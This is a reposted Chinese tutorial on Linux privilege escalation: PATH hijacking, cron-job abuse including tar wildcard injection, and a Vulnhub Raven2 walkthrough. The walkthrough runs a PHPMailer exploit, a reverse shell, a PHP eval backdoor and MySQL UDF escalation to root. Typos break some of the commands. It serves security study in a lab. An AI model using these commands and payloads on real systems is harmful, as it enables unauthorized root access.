IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> 提权—Linux 定时任务&环境变量&数据库 -> 正文阅读

[系统运维]提权—Linux 定时任务&环境变量&数据库

在这里插入图片描述

Linux提权环境变量安全-(aliyun,本地):

前提:需要配合SUID进行环境变量提权且是本地用户环境下(因此该方法比较难实现,鸡肋)

提权过程:手写调用文件-编译-复制文件-增加环境变量-执行触发。

//demo.c文件
#include<unistd.h>
void main(){
  setuid(0);
  setgid(0);
  system("ps");
}
gcc demo.c -o shell  //手写一个c语言文件,并上传编译为shell文件
cp /bin/sh /tmp/ps    //复制到目录
export PATH=/tmp:$PATH  //导入环境变量,类似windows配环境变量,直接命令下就能执行某文件,kali里各种工具都是如此
./shell  //执行当前目录shell文件
id

在这里插入图片描述
777:所有人都有读写执行权限。

在这里插入图片描述

Linux 提权本地定时任务安全-Aliyun

了解下定时任务命令:Linux crontab定期执行程序命令,运维一般用得到,做备份。

方法有三。

1)路径问题(没有成功实现):

利用计划任务指向的文件的相对路径解析问题。

cat /ect/crontab  //查看当前电脑定时任务
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/xiaodi/test.sh //前是相对,后是绝对
chmod +x /home/xiaodi/test.sh
/tmp/bash

原理就是:查看定时会执行的计划任务的内容,自己按照内容创建一个同名文件到目录,且是用的相对路径而非计划任务里的绝对路径,而执行定时任务时是以root执行的,我们创建的相对路径下的同名文件就会被执行,而不执行原绝对路径下的文件。

2)命令问题(一般是本地提权):

利用通配符配合命令参数自定义命令实现提权:

前提是定时任务里有类似此条的命令cd /home/undead/script; tar czf /tmp/backup.tar.gz *

cd /home/undead/script; tar czf /tmp/backup.tar.gz *  //会将前一个路径下的所有文件(*通配符代表所有压缩打包到后一个目录下并命名)
echo 'cp /bin/basn /tmp/bash;chmod +s /tmp/bash' >
/home/undead/script/test.sh
echo " " > "--checkpoint-action=exec=sh tesh.sh" 
echo " " >--checkpoint=1

本来压缩目录到指定文件夹就一个压缩文件里边有被压缩的四个文件,但当我们在往目录里边添加两个文件然后定时任务执行后却会在指定文件夹多出一个文件:

构造的两个文件名:

--checkpoint=1
--checkpoint-action=exec=sh tset.sh

在这里插入图片描述

原理是:tar命令压缩时不会破坏被压缩文件的文件名,但当我们的一个文件名是tar命令的参数时,配合上通配符*,就会出现意外,导致执行文件名即参数指定的文件即test.sh(之前suid提权的操作),此时bash即有suid权限进而可以提权。
在这里插入图片描述
tar命令详解

3)权限问题:
利用不安全的权限分配操作导致的定时任务覆盖。

chmod 777 775等, 所有者 、组、 其他成员的权限,一般为管理员为定时任务分配了不当的权限,例如777,导致普通用户可以对定时任务进行覆盖,从而提权。

判断漏洞:ls -al 目录
在这里插入图片描述

Linux 提权第三方数据库 MYSQL_UDF-Vulnhub

vulnhub靶机下载 Raven2 靶机(phpmailer漏洞+mysql的UDF提权)

nmap扫同网段,扫端口,然后有80端口,目录爆破一下:
在这里插入图片描述
dirbuster爆破到vendor目录,有PHPMailerAutoload.php文件:
在这里插入图片描述
网上查到该漏洞,可以去kali里找到漏洞,下载exp脚本:
在这里插入图片描述
然后修改exp内容(详细参考这篇文章),kali监听端口,python获取pty即前面提到过的shell不支持加交互构造伪终端python -c 'import pty;pty.spawn("/bin/bash")'反弹shell到我们kali上在这里插入图片描述
拿到网站权限,上传信息收集探针提权(我们需要将自己web服务打开,让靶机直接wget下载之前提到的探针LinEnum并chmod +x LinEnum.sh 加权运行):
在这里插入图片描述
探针到一大堆东西,可以看到mysql服务,且为root权限,
在这里插入图片描述
上传后门echo '<?php eval($_POST[x]);?>' >1.php,蚁剑一连,打开root目录果然没权限打开,找到wordpress上的配置信息,连数据库:
在这里插入图片描述
在这里插入图片描述
版本是5.5.60,之前数据库提权时知道此时可以利用udf提权,本地下载编译运行:

#利用 Mysql 提权 searchsploit
下载 mysql udf poc 进行编译
wget https://www.exploit-db.com/download/1518
mv 1518 raptor_udf.c
gcc -g -c raptor_udf.c
gcc -g -shared -o raptor_udf.so raptor_udf.o -lc
mv raptor_udf.so 1518.so

在这里插入图片描述
之后将1518.so移动到/tmp目录下:
在这里插入图片描述
在mysql下udf提权,命令如下:

#进入数据库进行 UDF 导出:
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
select * from mysql.func;
#创建 do_system 函数调用:
create function do_system returns integer soname '1518.so'select do_system('chmod u+s /usr/bin/find');
exit

在这里插入图片描述
中间移动1518.so时可以在目录看到文件:
在这里插入图片描述
最后输入find / -exec "/bin/sh" \;成功提权为root拿到flag:
在这里插入图片描述
在这里插入图片描述
该靶机目的其实是拿到四个flag,参考这篇文章即可:https://blog.csdn.net/nzjdsds/article/details/93971746

Linux提权总结,其他方法参考《权限提升-linux提权手法总结》

1.提权环境,信息收集(SUID,定时任务,可能漏洞,第三方服务应用等)。
2.最新相关漏洞要明确(关注点),二次开发相关脚本学会展望(比如那四个脚本)。
3.本地searchsploit脚本及远程exploitdb站点搜索说明。
4.其他提权方法如:密码复用(mysql或其他第三方应用密码有可能是root密码),guid,sudo等说明(运气,同理,鸡肋等)。

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2022-02-05 22:03:22  更:2022-02-05 22:05:22 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/16 5:51:18-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码